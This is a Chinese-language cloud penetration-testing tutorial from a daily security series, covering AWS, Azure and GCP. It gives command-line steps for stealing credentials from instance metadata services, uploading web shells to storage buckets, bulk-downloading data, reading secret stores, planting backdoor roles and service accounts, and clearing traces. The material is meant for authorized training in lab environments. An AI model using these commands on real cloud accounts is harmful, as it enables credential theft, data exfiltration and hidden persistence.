Day-062-云安全综合实战

# Day 60: 云安全综合实战

> Web 安全系列第 30 天 | 预计阅读时间：40 分钟 | 难度：★★★★☆

---

## 清单 目录

1. [综合实战概述](#综合实战概述)
2. [实战环境搭建](#实战环境搭建)
3. [AWS 实战演练](#aws 实战演练)
4. [Azure 实战演练](#azure 实战演练)
5. [GCP 实战演练](#gcp 实战演练)
6. [多云安全实战](#多云安全实战)
7. [漏洞利用实战](#漏洞利用实战)
8. [实战案例分析](#实战案例分析)
9. [总结与思考](#总结与思考)
10. [参考资料](#参考资料)

---

## 综合实战概述

### 实战目标

**学习目标**：
```
1. 综合运用云安全技术
   - AWS 安全测试
   - Azure 安全测试
   - GCP 安全测试
   - 多云安全

2. 掌握完整渗透流程
   - 信息收集
   - 漏洞发现
   - 漏洞利用
   - 权限提升
   - 报告编写

3. 培养实战思维
   - 攻击者视角
   - 系统性思考
   - 问题解决能力
```

**实战范围**：
```
1. 身份与访问管理
   - IAM 配置审计
   - 权限提升
   - 凭证泄露

2. 网络安全
   - 安全组/NSG
   - VPC/VNet
   - 防火墙规则

3. 存储安全
   - S3/Blob/Storage
   - 公开访问
   - 数据泄露

4. 计算安全
   - EC2/VM/Instances
   - 元数据服务
   - 实例渗透
```

### 渗透测试流程

**标准流程**：
```
1. 前期交互
   - 确定范围
   - 获取授权
   - 制定计划

2. 信息收集
   - 云资源枚举
   - 配置信息
   - 凭证泄露

3. 威胁建模
   - 资产识别
   - 威胁分析
   - 攻击面映射

4. 漏洞分析
   - 配置审计
   - 漏洞扫描
   - 手工验证

5. 渗透攻击
   - 漏洞利用
   - 权限提升
   - 横向移动

6. 后渗透
   - 数据收集
   - 持久化
   - 痕迹清理

7. 报告编写
   - 发现总结
   - 风险评估
   - 修复建议
```

---

## 实战环境搭建

### AWS 测试环境

**账户准备**：
```bash
# 1. 创建测试账户
# - 独立 AWS 账户
# - 启用 MFA
# - 配置账单告警

# 2. 配置 CLI
aws configure
aws configure set profile.test aws_access_key_id
aws configure set profile.test aws_secret_access_key

# 3. 创建测试资源
# - VPC
# - EC2 实例
# - S3 存储桶
```

**靶场环境**：
```
Flaws.cloud:
- AWS 安全靶场
- 多个挑战
- 免费使用

CloudGoat:
- Rhino Security Labs
- 易受攻击环境
- Terraform 部署

Sadcloud:
- 多云靶场
- 错误配置
- 学习工具
```

### Azure 测试环境

**订阅准备**：
```bash
# 1. 创建测试订阅
# - Azure 免费账户
# - 独立订阅
# - 预算限制

# 2. 配置 CLI
az login
az account set --subscription "Test Subscription"

# 3. 创建测试资源
# - VNet
# - VM 实例
# - Storage Account
```

**靶场环境**：
```
AzureGoat:
- Bridgecrew Labs
- Azure 靶场
- Terraform 部署

Azurite:
- Azure 渗透工具
- 自动化测试
- 漏洞利用
```

### GCP 测试环境

**项目准备**：
```bash
# 1. 创建测试项目
# - GCP 免费账户
# - 独立项目
# - 预算限制

# 2. 配置 CLI
gcloud auth login
gcloud config set project test-project

# 3. 创建测试资源
# - VPC
# - GCE 实例
# - GCS 存储桶
```

**靶场环境**：
```
GCPGoat:
- Bridgecrew Labs
- GCP 靶场
- Terraform 部署

GCPBucketBrute:
- 存储桶暴力
- 权限测试
- 自动化扫描
```

---

## AWS 实战演练

### 信息收集

**凭证扫描**：
```bash
# GitHub 凭证扫描
trufflehog git https://github.com/target/repo

# 公开凭证扫描
# 使用 Pacu
pacu
run aws__enum__account
```

**资源枚举**：
```bash
# 枚举 S3 存储桶
aws s3 ls s3://bucket-name
aws s3api list-buckets

# 枚举 EC2 实例
aws ec2 describe-instances

# 枚举 IAM 用户
aws iam list-users
aws iam list-access-keys
```

**权限侦察**：
```bash
# 检查当前权限
aws sts get-caller-identity
aws iam get-user

# 枚举角色
aws iam list-roles
aws iam get-role --role-name role-name
```

### 漏洞利用

**S3 公开访问**：
```bash
# 发现公开桶
aws s3 ls s3://target-bucket

# 下载文件
aws s3 cp s3://target-bucket/sensitive-data.txt .

# 上传文件（如果允许）
aws s3 cp shell.php s3://target-bucket/
```

**元数据服务**：
```bash
# 访问实例元数据
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# 获取临时凭证
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name

# 使用凭证
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
```

**权限提升**：
```bash
# 检查可传递角色
aws iam list-roles --query "Roles[?AssumeRolePolicyDocument]"

# 传递角色创建实例
aws ec2 run-instances --iam-instance-profile Name=AdminRole

# 模拟角色
aws sts assume-role --role-arn arn:aws:iam::123456789012:role/AdminRole
```

### 后渗透

**数据收集**：
```bash
# 下载 S3 数据
aws s3 cp s3://target-bucket/ ./data --recursive

# 导出数据库
aws rds export-db-snapshot --db-snapshot-identifier snapshot

# 获取 Secrets
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id secret-name
```

**持久化**：
```bash
# 创建访问密钥
aws iam create-access-key --user-name target-user

# 创建后门角色
aws iam create-role --role-name backdoor-role ...

# 修改信任策略
aws iam update-assume-role-policy --role-name role-name ...
```

---

## Azure 实战演练

### 信息收集

**凭证扫描**：
```bash
# GitHub 凭证扫描
trufflehog git https://github.com/target/repo

# Azure 特定扫描
# 使用 Stormspotter
# 使用 ROADtools
```

**资源枚举**：
```bash
# 枚举存储账户
az storage account list

# 枚举 VM 实例
az vm list

# 枚举用户
az ad user list
```

**权限侦察**：
```bash
# 检查当前权限
az account show
az role assignment list --assignee-me

# 枚举角色
az role definition list
az ad sp list
```

### 漏洞利用

**存储桶公开访问**：
```bash
# 访问公开容器
az storage blob list --container-name container --account-name account

# 下载文件
az storage blob download --container-name container --name file.txt

# 上传文件（如果允许）
az storage blob upload --container-name container --file shell.php
```

**服务主体滥用**：
```bash
# 获取服务主体凭证
# 从配置文件/代码中

# 模拟服务主体
az login --service-principal -u client-id -p client-secret --tenant tenant-id

# 访问资源
az resource list
```

**权限提升**：
```bash
# 检查可模拟角色
az role assignment list --assignee service-principal

# 修改 IAM 策略
az role assignment create --assignee user --role "Contributor"

# 创建管理员
az ad user create --user-principal-name admin@target.com ...
```

### 后渗透

**数据收集**：
```bash
# 下载存储数据
az storage blob download-batch --source container --destination ./data

# 导出数据库
az sql db export ...

# 获取 Key Vault 秘密
az keyvault secret list --vault-name vault-name
az keyvault secret show --vault-name vault-name --name secret-name
```

**持久化**：
```bash
# 创建服务主体
az ad sp create-for-rbac --name backdoor

# 分配权限
az role assignment create --assignee sp-id --role "Contributor"

# 修改访问策略
az keyvault set-policy --name vault-name --spn sp-id ...
```

---

## GCP 实战演练

### 信息收集

**凭证扫描**：
```bash
# GitHub 凭证扫描
trufflehog git https://github.com/target/repo

# GCP 特定扫描
# 使用 GCPBucketBrute
# 使用 GCP 侦察工具
```

**资源枚举**：
```bash
# 枚举存储桶
gsutil ls gs://

# 枚举实例
gcloud compute instances list

# 枚举服务账户
gcloud iam service-accounts list
```

**权限侦察**：
```bash
# 检查当前权限
gcloud config list
gcloud projects get-iam-policy project-id

# 枚举角色
gcloud iam roles list
```

### 漏洞利用

**存储桶公开访问**：
```bash
# 访问公开桶
gsutil ls gs://target-bucket

# 下载文件
gsutil cp gs://target-bucket/file.txt .

# 上传文件（如果允许）
gsutil cp shell.php gs://target-bucket/
```

**元数据服务**：
```bash
# 访问实例元数据
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" \
  -H "Metadata-Flavor: Google"

# 获取服务账户令牌
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
  -H "Metadata-Flavor: Google"

# 使用令牌
export ACCESS_TOKEN=...
```

**权限提升**：
```bash
# 检查可模拟服务账户
gcloud iam service-accounts list --filter="iam.serviceAccountTokenCreator"

# 创建服务账户密钥
gcloud iam service-accounts keys create key.json \
  --iam-account=service-account@project.iam.gserviceaccount.com

# 模拟服务账户
gcloud iam service-accounts simulate ...
```

### 后渗透

**数据收集**：
```bash
# 下载存储数据
gsutil cp -r gs://target-bucket ./data

# 导出数据库
gcloud sql export sql ...

# 获取 Secret Manager 秘密
gcloud secrets list
gcloud secrets versions access latest --secret=secret-name
```

**持久化**：
```bash
# 创建服务账户密钥
gcloud iam service-accounts keys create backdoor-key.json ...

# 分配权限
gcloud projects add-iam-policy-binding project \
  --member=serviceAccount:backdoor@project.iam.gserviceaccount.com \
  --role=roles/editor

# 修改 IAM 策略
gcloud projects set-iam-policy project policy.json
```

---

## 多云安全实战

### 跨云攻击

**凭证重用**：
```
场景：
- 同一凭证用于多云
- AWS + Azure + GCP
- 凭证泄露影响所有云

利用：
1. 获取 AWS 凭证
2. 尝试 Azure 登录
3. 尝试 GCP 登录

防护：
- 独立凭证
- MFA 启用
- 监控异常
```

**信任关系滥用**：
```
场景：
- 云间信任关系
- 跨云角色假定
- 联合身份

利用：
1. 攻陷一个云
2. 利用信任关系
3. 访问其他云

防护：
- 限制信任关系
- 最小权限
- 监控跨云访问
```

### 混合云攻击

**本地 - 云连接**：
```
场景：
- 混合云架构
- 本地 AD 同步
- VPN/专线连接

利用：
1. 攻陷本地环境
2. 同步到云端
3. 访问云资源

防护：
- 网络隔离
- 身份分离
- 监控同步
```

**身份同步攻击**：
```
场景：
- Azure AD Connect
- GCP Cloud Identity
- AWS SSO

利用：
1. 攻陷同步服务
2. 修改同步规则
3. 权限提升

防护：
- 保护同步服务
- 监控同步
- 最小权限
```

---

## 漏洞利用实战

### 常见攻击场景

**场景 1: 凭证泄露攻击链**：
```
攻击链：
1. GitHub 扫描
   - 搜索硬编码凭证
   - 公开仓库
   - 历史提交

2. 凭证验证
   - 测试凭证有效性
   - 检查权限
   - 枚举资源

3. 权限提升
   - 查找过度权限
   - 角色假定
   - 策略修改

4. 数据窃取
   - 访问存储
   - 下载数据
   - 清理痕迹
```

**场景 2: SSRF 攻击链**：
```
攻击链：
1. 发现 SSRF
   - Web 应用
   - 函数服务
   - API 服务

2. 访问元数据
   - 获取凭证
   - 访问内网
   - 横向移动

3. 权限提升
   - 使用凭证
   - 访问资源
   - 提升权限

4. 数据窃取
   - 访问存储
   - 下载数据
   - 清理痕迹
```

**场景 3: 存储泄露攻击链**：
```
攻击链：
1. 发现公开存储
   - 自动化扫描
   - 子域名枚举
   - 证书透明度

2. 数据侦察
   - 列出文件
   - 下载敏感文件
   - 查找凭证

3. 凭证利用
   - 测试凭证
   - 访问资源
   - 权限提升

4. 横向移动
   - 访问其他服务
   - 跨云访问
   - 数据窃取
```

### 自动化工具

**Pacu (AWS)**：
```bash
# 安装
git clone https://github.com/RhinoSecurityLabs/pacu
cd pacu
pip install -r requirements.txt

# 使用
python3 pacu.py
import_scan <session_name>
run aws__enum__account
run aws__privesc__scan
```

**ROADtools (Azure)**：
```bash
# 安装
pip install roadrecon

# 认证
roadrecon auth -u user@target.com -p password

# 收集数据
roadrecon gather

# 分析
roadrecon gui
```

**GCP 工具**：
```bash
# GCPBucketBrute
git clone https://github.com/RhinoSecurityLabs/GCPBucketBrute
python3 gcpbucketbrute.py -p project-id

# GCP 侦察
gcloud projects list
gcloud projects get-iam-policy project-id
```

---

## 实战案例分析

### 案例 1: 多云凭证泄露

**目标**：
```
某跨国公司
目标：获取敏感数据
范围：AWS + Azure + GCP
```

**攻击流程**：
```
1. 信息收集
   - GitHub 扫描
   - 发现硬编码凭证
   - AWS + Azure 凭证

2. 凭证验证
   - 测试 AWS 凭证
   - 测试 Azure 凭证
   - 检查权限

3. AWS 利用
   - 访问 S3 存储桶
   - 下载敏感数据
   - 权限提升

4. Azure 利用
   - 访问 Storage Account
   - 下载敏感数据
   - 横向移动

5. 数据汇总
   - 整合数据
   - 清理痕迹
   - 报告编写
```

### 案例 2: SSRF 到云沦陷

**目标**：
```
某云原生应用
目标：完全控制云环境
范围：GCP 环境
```

**攻击流程**：
```
1. 发现 SSRF
   - Web 应用漏洞
   - 可访问内网
   - 可访问元数据

2. 获取凭证
   - 访问元数据服务
   - 获取服务账户令牌
   - 验证权限

3. 权限提升
   - 检查服务账户权限
   - 发现过度权限
   - 访问关键资源

4. 横向移动
   - 访问其他项目
   - 访问其他服务
   - 完全控制

5. 数据窃取
   - 访问存储桶
   - 下载敏感数据
   - 清理痕迹
```

---

## 总结与思考

### 核心要点回顾

1. **云安全测试**
   - 信息收集
   - 漏洞挖掘
   - 权限提升

2. **多云安全**
   - 凭证管理
   - 信任关系
   - 统一监控

3. **自动化测试**
   - 扫描工具
   - 利用框架
   - 持续监控

### 深入思考问题

1. **云安全未来**？
   - Serverless 安全
   - 容器安全
   - AI 安全

2. **合规挑战**？
   - 多云合规
   - 数据驻留
   - 隐私保护

3. **零信任云**？
   - 持续验证
   - 微隔离
   - 动态授权

### 实战建议

**云安全人员**：
1. 学习多云安全
2. 掌握自动化工具
3. 持续学习
4. 分享经验

**云架构师**：
1. 安全设计
2. 最佳实践
3. 合规要求
4. 成本优化

**开发人员**：
1. 安全编码
2. 凭证管理
3. 依赖管理
4. 安全测试

---

## 参考资料

### 学习资源
- [OWASP Cloud Security](https://owasp.org/www-project-cloud-security/)
- [Cloud Security Alliance](https://cloudsecurityalliance.org/)
- [Awesome Cloud Security](https://github.com/4ndersonLin/awesome-cloud-security)

### 工具资源
- [Pacu](https://github.com/RhinoSecurityLabs/pacu)
- [ROADtools](https://github.com/dirkjanm/ROADtools)
- [Scout Suite](https://github.com/nccgroup/ScoutSuite)
- [Prowler](https://github.com/prowler-cloud/prowler)

### 书籍推荐
- 《云安全实战》
- 《Practical Cloud Security》
- 《Cloud Security and Privacy》
- 《Penetration Testing: A Hands-On Introduction to Hacking》

### 在线资源
- [HackerOne Cloud Reports](https://hackerone.com/hacktivity)
- [Bugcrowd Cloud Reports](https://www.bugcrowd.com/resources/)
- [PayloadsAllTheThings Cloud](https://github.com/swisskyrepo/PayloadsAllTheThings)
- [HackTricks Cloud](https://book.hacktricks.xyz/cloud-security)

---

**标记 明日预告**：Day 61 - 容器安全基础

> 本文内容仅供学习和研究使用，请勿用于非法目的。所有实验请在隔离环境中进行。

---

*本文是 365 天信息安全技术系列的第 60 篇，Web 安全部分第 30 篇，精编版本*